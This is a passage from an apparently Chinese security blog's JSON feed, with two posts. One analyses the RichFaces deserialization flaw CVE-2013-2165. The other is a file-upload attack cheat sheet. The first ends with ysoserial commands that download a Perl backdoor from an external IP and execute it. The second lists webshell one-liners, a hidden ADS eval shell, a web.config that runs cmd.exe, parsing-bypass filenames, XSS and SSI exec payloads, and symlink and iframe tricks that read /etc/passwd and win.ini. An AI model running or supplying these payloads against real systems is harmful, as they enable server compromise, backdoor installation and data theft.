src=\"https:\/\/ws2.sinaimg.cn\/large\/006tNbRwly1fvh4aiq4fyj31kw0q9khe.jpg\" alt=\"\" \/>\n\u767d\u76d2\u6d4b\u8bd5\uff1a<br \/>\nwriteObject \u5e8f\u5217\u5316\u662f\u7528\u4e8e\u5c06\u5bf9\u8c61\u8f6c\u6362\u6210\u4e8c\u8fdb\u5236\u4e32\u5b58\u50a8<br \/>\nreadObjec \u5c06\u4e8c\u8fdb\u5236\u4e32\u8f6c\u6362\u6210\u5bf9\u8c61<\/li>\n<\/ol>\n\n<p>\u518d\u6765\u770b\u4e0bRichFaces\u4efb\u610fjava\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<br \/>\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furtuu21mkj310003i75q.jpg\" alt=\"\" \/>\n\u5f71\u54cd\u7248\u672c\uff1aRichFaces 3.x \u2264 3.3.3 and 4.x \u2264 4.3.2\n\u4fee\u590d\u7248\u672c\uff1aRichFaces 3.3.4 and 4.3.3<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>RIchFaces\u5b58\u5728\u7684\u6f0f\u6d1e\u7684\u548c\u5229\u7528\u65b9\u5f0f    #\u56e0RIchFaces16\u5e74\u4e0d\u518d\u7ef4\u62a4\uff0c\u6240\u4ee5\u7528\u6700\u65b0\u7684rf-143\u5e94\u8be5\u53ef\u4ee5\u6253\u4e0b\nRichFaces 3\n3.1.0 \u2264 3.3.3: CVE-2013-2165\n3.1.0 \u2264 3.3.4: RF-14310\nRichFaces 4\n4.0.0 \u2264 4.3.2: CVE-2013-2165\n4.0.0 \u2264 4.5.4: CVE-2015-0279\n4.5.3 \u2264 4.5.17: RF-14309\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x02-\u6f0f\u6d1e\u5206\u6790\">0x02 \u6f0f\u6d1e\u5206\u6790<\/h1>\n<p>\u672c\u5730\u73af\u5883 mac + idea2018.01 + tomcat7<br \/>\n<a href=\"https:\/\/github.com\/orangetw\/My-CTF-Web-Challenges\/blob\/master\/hitcon-ctf-2016\/angry%20seam\/angryseam.war\">angryseam.war<\/a>  <br \/>\n<a href=\"http:\/\/seamframework.org\/Seam2\/Downloads.html\">\u76f8\u5173jar\u5305<\/a> #\u5bfc\u5165\u76f8\u5e94\u7684jar\u5305<br \/>\n\u6211\u4eec\u5148\u7b80\u5355\u770b\u4e0b\u6f0f\u6d1e\u8be6\u60c5 \n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furuh6w3xnj31400guage.jpg\" alt=\"\" \/>\n\u56e0\u4e3a\u6211\u4f7f\u7528\u7684\u662fRichFaces3.x\uff0c\u6240\u4ee5\u9488\u5bf93.x\u6765\u8bf4\uff0c\u5728\u8bf7\u6c42\u8d44\u6e90\u7684\u65f6\u5019\uff0c\u4f1a\u8fdb\u5165ResourceBuilderImpl.getResourceDataForKey(String)\u6765\u8fdb\u884c\u5904\u7406\uff0c\u5982\u679c\u8bf7\u6c42\u8d44\u6e90\u4ee5\/DATA\u6216\u8005\/DATB\u4e3a\u5f00\u5934\uff0c\u6570\u636e\u4f1a\u88abResourceBuilderImpl.decrypt(byte)\u89e3\u5bc6\uff0c\u7136\u540e\u8fdb\u884c\u76f8\u5173\u53cd\u5e8f\u5217\u5316\u3002\n\u5728org.ajax4jsf.resource.ResourceBuilderImpl\u4e2d232\u884cgetResourceDataForKey\u51fd\u6570\u4e2d\u3002\n\u5c06\u4f20\u9012\u8fc7\u6765\u7684key\u89e3\u5bc6\uff0c\u540e\u7eed\u4f20\u5165readobject\u9020\u6210\u53cd\u5e8f\u5217\u5316\u9020\u6210\u547d\u4ee4\u6267\u884c\u3002\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furv6pwvwxj31kw0qn4di.jpg\" alt=\"\" \/>\nrichfaces\u5e93\u9ed8\u8ba4\u5904\u7406a4j\u5f00\u5934\u7684\u8def\u5f84\u8d44\u6e90\u7136\u540e\u5c06\/a4j\/g\/3_3_3.Finalorg\/\u7248\u672c\u4fe1\u606f\u79fb\u9664<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\/a4j\/g\/3_3_3.Finalorg\/richfaces\/renderkit\/html\/scripts\/skinning.js\/DATA\/xxxx \n<\/code><\/pre><\/div><\/div>\n<p>\u7136\u4f1a\u5c06\u8d44\u6e90\u4f20\u5165getResourceDataForKey\u5e76\u5c06DATA\u540e\u9762\u7684\u89e3\u7801\n\u6784\u9020payload\u65f6 \u6211\u4eec\u53ea\u9700\u8981\u8c03\u7528\u8be5\u65b9\u6cd5\u4e0b\u9762\u7684encrypt\u5373\u53ef\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furzrgzv3sj31kw0ryqdv.jpg\" alt=\"\" \/>\n\u5177\u4f53poc\u76f8\u5173\u4ee3\u7801\u5982\u4e0b\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1furzt2vofzj31kw0kytkn.jpg\" alt=\"\" \/>\n\u5229\u7528\u65b9\u6cd5:<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u5148\u7528ysoserial\u751f\u6210\u76f8\u5173payload\njava -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 \"wget http:\/\/74.121.151.89\/123344\/back.pl -P \/tmp\/\" &gt; payload.bin\njava -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 \"perl \/tmp\/back.pl\" &gt; p.bin\n\u7136\u540e\u6267\u884chello.java\u751f\u6210\u52a0\u5bc6\u540epayload\uff0c\u518d\u8bbf\u95ee\u5373\u53ef\nhttp:\/\/localhost:8011\/seam\/a4j\/g\/3_3_3.Finalorg\/richfaces\/renderkit\/html\/scripts\/skinning.js\/DATA\/your-payload\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"rf-14310-arbitrary-el-evaluation\">RF-14310: Arbitrary EL Evaluation<\/h1>\n<p>\u5bb9\u6211\u5148\u53d1\u51fa\u6765\uff0c\u5148\u5b66\u4e00\u6ce2java\uff0c\u540e\u7eed\u8865\u5145\u3002\n\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>http:\/\/www.polaris-lab.com\/index.php\/archives\/567\/\nhttps:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/\nhttps:\/\/github.com\/federicodotta\/Java-Deserialization-Scanner\/releases\nhttp:\/\/vnprogramming.com\/index.php\/2016\/10\/10\/web500-hitconctf-2016-and-exploit-cve-2013-2165\/\nhttps:\/\/codewhitesec.blogspot.com\/2018\/05\/poor-richfaces.html\nhttps:\/\/bl4ck.in\/vulnerability\/analysis\/2018\/03\/28\/Attack-Seam-Framework.html\n<\/code><\/pre><\/div><\/div>\n<p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/08\/RichFaces\u53cd\u5e8f\u5217\u8bdd\u6f0f\u6d1e\u2014\u2014CVE-2013-2165\/\">code-audit<\/a><\/p>\n\n","pubDate":"Thu, 30 Aug 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/08\/RichFaces%E5%8F%8D%E5%BA%8F%E5%88%97%E8%AF%9D%E6%BC%8F%E6%B4%9E-CVE-2013-2165\/","guid":"http:\/\/notwhy.github.io\/2018\/08\/RichFaces%E5%8F%8D%E5%BA%8F%E5%88%97%E8%AF%9D%E6%BC%8F%E6%B4%9E-CVE-2013-2165\/","category":"java"},{"title":"file-upload","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 \u524d\u8a00<\/h1>\n<hr \/>\n<p>\u2003\u2003\u5bf9\u6587\u4ef6\u4e0a\u4f20\u8fdb\u884c\u4e00\u4e2a\u603b\u7ed3,\u5982\u679c\u4f60\u8fd8\u6ca1\u6709\u770b\u8fc7<a href=\"https:\/\/xz.aliyun.com\/t\/2435\">Upload-labs\u901a\u5173\u624b\u518c<\/a>\uff0c\u5efa\u8bae\u5148\u770b\uff0c\u672c\u6587\u662f\u5bf9\u5176\u7684\u4e00\u4e2a\u7b80\u5355\u8865\u5145,\u53e6\u5916\u672c\u6587\u4e0d\u5bf9\u8de8\u57df\u7b49\u8fdb\u884c\u603b\u7ed3\uff0c\u540e\u7eed\u4f1a\u9646\u7eed\u6dfb\u52a0\u3002<\/p>\n\n<h1 id=\"0x01-\u901a\u7528\">0x01 \u901a\u7528<\/h1>\n<h2 id=\"1-shell\">1. shell<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;% out.println(\"Hello test\");%&gt;     #jsp jspx \n&lt;%response.write(\"hello test\")%&gt;        #asp asmx aspx ashx soap web.config\n&lt;?php echo 11111;?&gt;     #php phtml phps  phpt php3 php3p php4 php5   #\u4e3b\u8981\u770b\u914d\u7f6e  \n\u6709\u4e9b\u7ba1\u7406\u5458\u53ef\u80fd\u4f1a\u628aphp\u548casp\u7a0b\u5e8f\u8bbe\u7f6e\u5728\u4e00\u4e2a\u5927\u76ee\u5f55\u4e0b(\u865a\u62df\u4e3b\u673a)\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2-xss\">2. xss<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u4e0a\u4f20htm html shtml xml\u6587\u4ef6\u7b49\nBasic XSS payload: &lt;script&gt;alert(1337)&lt;\/script&gt;\nXML-based XSS payload: &lt;a:script xmlns:a=\"http:\/\/www.w3.org\/1999\/xhtml\"&gt;alert(1337)&lt;\/a:script&gt;\n\"&gt;&lt;img src=# onerror=alert(1)&gt;.jpg   #\u6587\u4ef6\u4e0a\u4f20\u8f93\u51fa\u6587\u4ef6\u540d\u5bfc\u81f4xss window\u4e5f\u53ef\u4ee5\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3-\u89e3\u6790\u6f0f\u6d1e\">3. \u89e3\u6790\u6f0f\u6d1e<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>iis  \n\u6587\u4ef6\u683c\u5f0f\uff1a asa cer cdx\n\u76ee\u5f55\u89e3\u6790\uff1a \/1.asp\/1.jpg  #\u4e0a\u4f201.jpg\u62ff\u5230shell\n\u6587\u4ef6\u89e3\u6790\uff1a 1.asp;.jpg \nIIS 7.0\/IIS 7.5\n1.jpg\/.php  #\u4e0a\u4f201.jpg \u5728\u540e\u9762\u52a0\u4e0a\/.php\u76f4\u63a5\u5f53\u6210php\u6765\u6267\u884c\n\napache\n1.php.aaa   #\u9047\u5230\u4e0d\u80fd\u89e3\u6790\u7684\u7c7b\u578b\u9012\u5f52\u5411\u524d\u89e3\u6790 \u9ed8\u8ba4\u7c7b\u578b\u4e00\u822c\u662ftext\/plain\n1.php%0a    \u5f71\u54cd2.4.0~2.4.29 linux\u670d\u52a1\u5668#\u4e0a\u4f20\u65f61.php\u540e\u9762\u6dfb\u52a0\u4e00\u4e2a\\x0A #CVE-2017-15715 https:\/\/www.leavesongs.com\/PENETRATION\/apache-cve-2017-15715-vulnerability.html \n\nnginx&lt;8.03\u7a7a\u5b57\u8282\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e \n1.jpg%00.php   #\u4e0a\u4f201.jpg\u7136\u540eweb\u8bbf\u95ee\n1.jpg\/.php  #\u4e0a\u4f201.jpg \u5728\u540e\u9762\u52a0\u4e0a\/.php\u76f4\u63a5\u5f53\u6210php\u6765\u6267\u884c\nNginx 0.8.41\u81f31.4.3\u7248\u672c\u548c1.5.7\u4e4b\u524d\u76841.5.x\u7248\u672c CVE-2013-4547   #\u7ed5\u8fc7\u8bbf\u95ee\u9650\u5236\u8bfb\u53d6s.html \nhttp:\/\/127.0.0.1\/test \/..\/protected\/s.html  #\u6ce8\u610ftest\u76ee\u5f55\u540e\u6709\u4e00\u4e2a\u7a7a\u683c\n# \u89e3\u6790\u6f0f\u6d1e\u9700\u8981test%20\u76ee\u5f55(window\u4e0d\u9700\u8981) #\u4f7f\u7528curl\u6d4b\u8bd5 \n1.jpg \\0.php  #1.jpg[0x20][0x00].php    #\u4f7f\u7528burp\u66f4\u6539\u7f16\u7801\n\n#IIS\u548cNginx\u4e00\u770b\u5230URL\u4e2d\u6587\u4ef6\u540e\u7f00\u662f.php\u5c31\u628a\u5b83\u5f53\u6210php\u6765\u89e3\u6790  \ncgi.fix_pathinfo(php\u4f1a\u5bf9\u8def\u5f84\u8fdb\u884c\u4fee\u7406\u5982\/tt.php\/111.jpg\/111.jpg 1.jpg\u4e0d\u5b58\u5728\u4f1a\u5f53\u62101.php\u5904\u7406) \n\nlighttpd\n1.jpg\/1.php\n\nphp cgi\u89e3\u6790\u6f0f\u6d1e\n\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u9009\u9879cgi.fix_pathinfo = 1\u5f00\u542f\u65f6 \u5f53\u8bbf\u95eehttp:\/\/www.xxx.com\/x.txt\/x.php x.php\u4e0d\u5b58\u5728 \u4f1a\u628ax.txt\u5f53\u6210php\u6765\u6267\u884c\n\n<\/code><\/pre><\/div><\/div>\n\n<h1 id=\"0x02-window\">0x02 window<\/h1>\n<h2 id=\"1\u622a\u65ad\">1.\u622a\u65ad<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>window \u6587\u4ef6\u547d\u540d\u89c4\u8303   #https:\/\/docs.microsoft.com\/zh-cn\/windows\/desktop\/FileIO\/naming-a-file  \nwindow8.3\u80fd\u7528\u4f46\u662f\u4f1a\u91cd\u547d\u540d\u4e3aweb~1.con     Note 1: Windows 8.3 feature could also be used but it would rename the web.config file to web~1.con in the end.\n\u4e0d\u80fd\u76f4\u63a5\u4e0a\u4f20\u5e26\u6709&lt; &gt;\u7684\u6587\u4ef6\uff0c\u53ea\u80fd\u8986\u76d6\u4ed6\u4eec   Note 2: Asterisk and question mark symbols cannot be used directly as the file system rejects them.\n\u5c3d\u91cf\u624b\u52a8\u53bb\u8f93\u51fa\uff0c\u800c\u4e0d\u662f\u7b80\u5355\u7684\u590d\u5236\u7c98\u8d34      Note 3: Sometimes WordPress replaces double and single quotation marks with visually similar symbols. Therefore, it is recommended to type the vectors yourself in Burp Suite or other proxies that you use instead of copy\/paste them directly from here.\nPHP Windows     #\u4e5f\u53ef\u4ee5\u7528\u6765\u6587\u4ef6\u5305\u542b\n&gt;       ?       #Greater-than symbol (closing angle bracket \u201c&gt;\u201d) TO a question mark (\u201c?\u201d)\n&lt;       *       #Less-than symbol (opening angle bracket \u201c&lt;\u201d) TO an asterisk symbol (\u201c*\u201d)\n\"       .       #Double quotation mark (\"\"\") TO a dot character (\".\"\")   \n\n1.php%20(url decode)    1.php.    1.php%00(url decode)  #\u751f\u62101.php\u6587\u4ef6\n1.php:aaa               #\u751f\u6210\u7a7a\u6587\u4ef6 \u524d\u63d0\u662f\u8be5\u6587\u4ef6\u4e0d\u5b58\u5728\n1.ph&lt; or 1.ph&gt;          #\u751f\u6210php webshell\u6587\u4ef6\u3002\n\necho ^&lt;?php @eval(request[caidao])?^&gt;  &gt; index.php:hidden.jpg\n\u8fd9\u6837\u5b50\u5c31\u751f\u6210\u4e86\u4e00\u4e2a\u4e0d\u53ef\u89c1\u7684shell hidden.jpg\uff0c\u5e38\u89c4\u7684\u6587\u4ef6\u7ba1\u7406\u5668\u3001type\u547d\u4ee4\uff0cdir\u547d\u4ee4\u3001del\u547d\u4ee4\u53d1\u73b0\u90fd\u627e\u4e0d\u51fa\u90a3\u4e2ahidden.jpg\u7684\u3002\u6211\u4eec\u53ef\u4ee5\u5728\u53e6\u5916\u4e00\u4e2a\u6b63\u5e38\u6587\u4ef6\u91cc\u628a\u8fd9\u4e2aADS\u6587\u4ef6include\u8fdb\u53bb\uff0c&lt;?php include(\u2018index.php:hidden.jpg\u2019)?&gt;\uff0c\u8fd9\u6837\u5b50\u5c31\u53ef\u4ee5\u6b63\u5e38\u89e3\u6790\u6211\u4eec\u7684\u4e00\u53e5\u8bdd\u4e86\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2ads\u6587\u4ef6\u6d41\">2.ads\u6587\u4ef6\u6d41<\/h2>\n<p>1.php::$DATA    #\u6587\u4ef6\u6d41 \u751f\u62101.php\u6587\u4ef6  \u56fe\u7247\u540d\u5b57:\u6d41\u7684\u540d\u5b57:\u6d41\u7c7b\u578b<\/p>\n<h1 id=\"0x03-linux\">0x03 linux<\/h1>\n<h2 id=\"1\u6587\u4ef6\u4e0a\u4f20xss\">1.\u6587\u4ef6\u4e0a\u4f20xss<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\"&gt;&lt;img src=# onerror=alert(1)&gt;.jpg   #\u4e0a\u4f20\u8f93\u51fa\u6587\u4ef6\u540d\u5bfc\u81f4xss linux \u8c03\u7528\u6587\u4ef6\u5904\u4e5f\u53ef\u4ee5 \u53ef\u4ee5\u5728w3school\u6d4b\u8bd5https:\/\/www.w3schools.com\/jsref\/tryit.asp?filename=tryjsref_fileupload_value  \nlinux \u4e0a\u4f20php\u4e0d\u89e3\u6790 pHp\u7ed5\u8fc7\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x04-iis\">0x04 IIS<\/h1>\n<h2 id=\"1xss\">1.xss<\/h2>\n<p>\u6839\u636eweb server\u670d\u52a1\u5668fuzz\u4e00\u4e9b\u4e0d\u5e38\u89c1\u7684\u540e\u7f00\u540d\uff0c\u540c\u6837\u53ef\u4ee5\u5bfc\u81f4xss,\u8be6\u60c5\u53ef\u4ee5\u53c2\u8003\u8fd9\u7bc7\u6587\u7ae0https:\/\/mike-n1.github.io\/ExtensionsOverview<br \/>\nbasic    .cer .hxt .htm  .stm<br \/>\nxml    .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml<\/p>\n<h2 id=\"2file_include-or-command_exec\">2.file_include or command_exec<\/h2>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cIIS\u4e5f\u652f\u6301SSI(Server-Side Include)\u6269\u5c55\uff0cSSI\u662f\u4e3aWEB\u670d\u52a1\u5668\u63d0\u4f9b\u7684\u4e00\u5957\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u53ea\u8981\u76f4\u63a5\u5d4c\u5165\u5230HTML\u6587\u6863\u7684\u6ce8\u91ca\u5185\u5bb9\u4e4b\u4e2d\u5373\u53ef\uff0c\u7531\u4e8e\u5b89\u5168\u539f\u56e0\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u547d\u4ee4\u4f1a\u88ab\u7981\u6b62\u3002<br \/>\n<strong>\u82e5\u670d\u52a1\u5668\u4e0d\u652f\u6301.shtml #IIS \u89d2\u8272\u670d\u52a1-\u5e94\u7528\u7a0b\u5e8f\u5f00\u53d1-\u5728\u670d\u52a1\u5668\u7aef\u5305\u542b\u56fe\u7247\u70b9\u51fb\u5b89\u88c5\u89d2\u8272\u5373\u53ef<\/strong> <br \/>\nhttps:\/\/docs.microsoft.com\/en-us\/iis\/configuration\/system.webserver\/serversideinclude<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;!--#include file=\"web.config\"--&gt;   \/\/\u53ef\u4ee5\u7528\u6765\u8bfb\u6587\u4ef6\n&lt;!--#include virtual=\"\/includes\/header.html\" --&gt; \/\/\u4e5f\u662f\u8bfb\u6587\u4ef6 \u7edd\u5bf9\u8def\u5f84\n&lt;!--#exec cmd=\"ipconfig\"--&gt; \/\/\u662f\u5426\u53ef\u4ee5\u7528\u6765\u6267\u884c\u547d\u4ee4 \u9ed8\u8ba4\u60c5\u51b5\u4e0d\u4f1a\u5f00\u542f \u9700\u8981\u914d\u7f6e\u76f8\u5173\u6570\u636e  #win2008 IIS7\u5c1d\u8bd5\u5f00\u542f\u5931\u8d25\nExtensions for SSI: .stm .shtm .shtml   #iis\u5e38\u89c1\u7684\u4e00\u822c\u81ea\u5b9a\u4e49\u914d\u7f6e\u503c \u5176\u4ed6\u5982apache\u81ea\u5df1\u914d\u7f6e \u4e00\u822c\u4e3a.shtml  \n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3shell\">3.shell<\/h2>\n<p>asp asmx ashx soap svc      #http:\/\/py4.me\/blog\/?p=448<\/p>\n<h3 id=\"webconfig-\u9700\u8981asp\u73af\u5883\u652f\u6301\">web.config #\u9700\u8981asp\u73af\u5883\u652f\u6301<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code><span class=\"cp\">&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;<\/span>\n<span class=\"nt\">&lt;configuration&gt;<\/span>\n    <span class=\"nt\">&lt;system.webServer&gt;<\/span>\n        <span class=\"nt\">&lt;handlers<\/span> <span class=\"na\">accessPolicy=<\/span><span class=\"s\">\"Read, Script, Write\"<\/span><span class=\"nt\">&gt;<\/span>\n            <span class=\"nt\">&lt;add<\/span> <span class=\"na\">name=<\/span><span class=\"s\">\"web_config\"<\/span> <span class=\"na\">path=<\/span><span class=\"s\">\"*.config\"<\/span> <span class=\"na\">verb=<\/span><span class=\"s\">\"*\"<\/span> <span class=\"na\">modules=<\/span><span class=\"s\">\"IsapiModule\"<\/span> <span class=\"na\">scriptProcessor=<\/span><span class=\"s\">\"%windir%\\system32\\inetsrv\\asp.dll\"<\/span> <span class=\"na\">resourceType=<\/span><span class=\"s\">\"Unspecified\"<\/span> <span class=\"na\">requireAccess=<\/span><span class=\"s\">\"Write\"<\/span> <span class=\"na\">preCondition=<\/span><span class=\"s\">\"bitness64\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n        <span class=\"nt\">&lt;\/handlers&gt;<\/span>\n        <span class=\"nt\">&lt;security&gt;<\/span>\n            <span class=\"nt\">&lt;requestFiltering&gt;<\/span>\n                <span class=\"nt\">&lt;fileExtensions&gt;<\/span>\n                    <span class=\"nt\">&lt;remove<\/span> <span class=\"na\">fileExtension=<\/span><span class=\"s\">\".config\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n                <span class=\"nt\">&lt;\/fileExtensions&gt;<\/span>\n                <span class=\"nt\">&lt;hiddenSegments&gt;<\/span>\n                    <span class=\"nt\">&lt;remove<\/span> <span class=\"na\">segment=<\/span><span class=\"s\">\"web.config\"<\/span> <span class=\"nt\">\/&gt;<\/span>\n                <span class=\"nt\">&lt;\/hiddenSegments&gt;<\/span>\n            <span class=\"nt\">&lt;\/requestFiltering&gt;<\/span>\n        <span class=\"nt\">&lt;\/security&gt;<\/span>\n    <span class=\"nt\">&lt;\/system.webServer&gt;<\/span>\n<span class=\"nt\">&lt;\/configuration&gt;<\/span>\n<span class=\"err\">&lt;<\/span>%response.write(\"asp test\")%&gt;\n\u901a\u8fc7\u586b\u5165\u4e0b\u9762\u8bed\u53e5\u53ef\u6210\u529f\u6267\u884casp\u8bed\u53e5\n<span class=\"err\">&lt;<\/span>%\nResponse.write CreateObject(\"wscript.shell\").exec(\"cmd.exe \/c ipconfig\").StdOut.ReadAll\n%&gt;\n<span class=\"err\">&lt;<\/span>%=CreateObject(\"wscript.shell\").exec(\"cmd.exe \/c ipconfig\").StdOut.ReadAll()%&gt;\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"asmx\">asmx<\/h3>\n<p>asmx demo<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;%@ WebService Language=\"C#\" Class=\"Service\" %&gt;\n \nusing System.Web;\nusing System.Web.Services;\nusing System.Web.Services.Protocols;\n \npublic class Service : System.Web.Services.WebService\n{\n    [WebMethod]\n    public string HelloWorld() {\n        return \"HelloWorld\";\n    }\n}\n\nhttp:\/\/192.168.44.132:8980\/customize.asmx\/Chopper   #\u83dc\u5200\u5bc6\u7801z\nz=A     #POST\u67e5\u770b\u8fd0\u884c\u76ee\u5f55  \nhttp:\/\/192.168.44.132:8980\/asmxWebMethodSpy.asmx\/Invoke     #\u5bc6\u7801Ivan\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"ashx\">ashx<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\/\/\u6d4f\u89c8\u5668\u8bbf\u95ee\u8fd9\u4e2aashx\u6587\u4ef6\u6253\u5370Test!  #\u8bc1\u660e\u53ef\u4ee5\u4f7f\u7528\n&lt;%@ WebHandler Language=\"C#\" Class=\"Handler\" %&gt;\nusing System;\nusing System.Web;\npublic class Handler : IHttpHandler{\n    public void ProcessRequest(HttpContext context)\n    {\n        context.Response.Write(\"Test!\");\n    }\n    public bool IsReusable\n    {\n        get\n        {\n            return false;\n        }\n    }\n}\nhttp:\/\/192.168.44.132:8980\/HandlerSpy.ashx?Ivan=context.Response.Write(DateTime.Now.ToString())     #\u8f93\u51fa\u65f6\u95f4\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x05-apahce--httpd-or-tomcat\">0x05 apahce  (httpd or Tomcat)<\/h1>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>basic   .html.xxx .shtml\nxml .rdf .xht .xml .xsl .svg .xhtml .svgz   #apache\u8fd4\u56de\u5305\u91cc\u9762\u6ca1\u6709Content-type \u8fd9\u6837\u5c31\u53ef\u80fd\u6839\u636e\u6d4f\u89c8\u5668\u7684\u4e60\u6027\u9020\u6210xss\u653b\u51fb  \n<\/code><\/pre><\/div><\/div>\n<h2 id=\"1-shell-1\">1. shell<\/h2>\n<p>.htaccess<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>SetHandler application\/x-httpd-php  #\u6240\u6709\u6587\u4ef6\u89e3\u6790\u6210php \u4e5f\u53ef\u4ee5\u89e3\u6790\u6210\u5176\u4ed6\u811a\u672c\u5f62\u5f0f\u5982perl ruby\u53c2\u8003https:\/\/github.com\/wireghoul\/htshells\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x06-nginx\">0x06 nginx<\/h1>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>basic   .htm\nxml     .svg .xml .svgz\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x07\u6587\u4ef6\u8bfb\u53d6-or-ssrf-or-rce\">0x07.\u6587\u4ef6\u8bfb\u53d6 or SSRF or rce<\/h1>\n<h2 id=\"\u901a\u8fc7\u5ba2\u6237\u7aef\u6216\u8005\u76f8\u5e94\u7684\u524d\u7aef\u6846\u67b6\u672c\u5730\u8bfb\u53d6\u76f8\u5e94html\">\u901a\u8fc7\u5ba2\u6237\u7aef\u6216\u8005\u76f8\u5e94\u7684\u524d\u7aef\u6846\u67b6\u672c\u5730\u8bfb\u53d6\u76f8\u5e94html<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>&lt;script&gt;alert(document.location);&lt;\/script&gt;  #get file_location  \u67e5\u770b\u5f53\u524d\u6e90  \n\u52a8\u6001\u7684\u6267\u884c\u76f8\u5173js   #\u524d\u63d0\u662f\u8c03\u7528\u6587\u4ef6\u4f7f\u7528file\u534f\u8bae\n&lt;embed src=\"c:\\\\windows\\\\win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;object width=\"400\" height=\"400\" data=\"file:\/\/c:\/windows\/win.ini\"&gt;&lt;\/object&gt;\n&lt;iframe src=\"file:\/\/\/C:\/Windows\/win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;embed src=\"file:\/\/c:\/windows\/win.ini\" width=\"400\" height=\"400\"&gt;\n&lt;iframe src=\"http:\/\/localhost\"&gt;&lt;\/iframe&gt;\n&lt;iframe src=\"..\/..\/..\/web.xml\"&gt;&lt;\/iframe&gt;\n\nhttp:\/\/www.noob.ninja\/2017\/11\/local-file-read-via-xss-in-dynamically.html\nhttps:\/\/buer.haus\/2017\/06\/29\/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read\/\nhttps:\/\/mike-n1.github.io\/SSRF_P4toP2\nhttps:\/\/hackernoon.com\/cross-site-scripting-to-remote-code-execution-on-trellos-app-699512676f0c    #Cross-Site Scripting to Local File Inclusion on Trello\u2019s App\nhttps:\/\/hackerone.com\/reports\/243058\nhttps:\/\/maustin.net\/2015\/11\/12\/hipchat_rce.html     #XSS to RCE in Atlassian Hipchat\nhttps:\/\/medium.com\/@arbazhussain\/xss-using-dynamically-generated-js-file-a7a10d05ff08\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"2zip\u81ea\u89e3\u538b\">2.zip\u81ea\u89e3\u538b<\/h2>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>ln -s \/etc\/passwd link\nzip --symlinks test.zip link    #\u901a\u8fc7\u81ea\u89e3\u538bzip\u529f\u80fd\u5b9e\u73b0\u6587\u4ef6\u8bfb\u53d6https:\/\/xz.aliyun.com\/t\/2589    #\u4e0a\u4f20\u8f6f\u94fe\u63a5\u8bfb\u53d6passwd ln -s \/ test\n<\/code><\/pre><\/div><\/div>\n\n<p>\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre 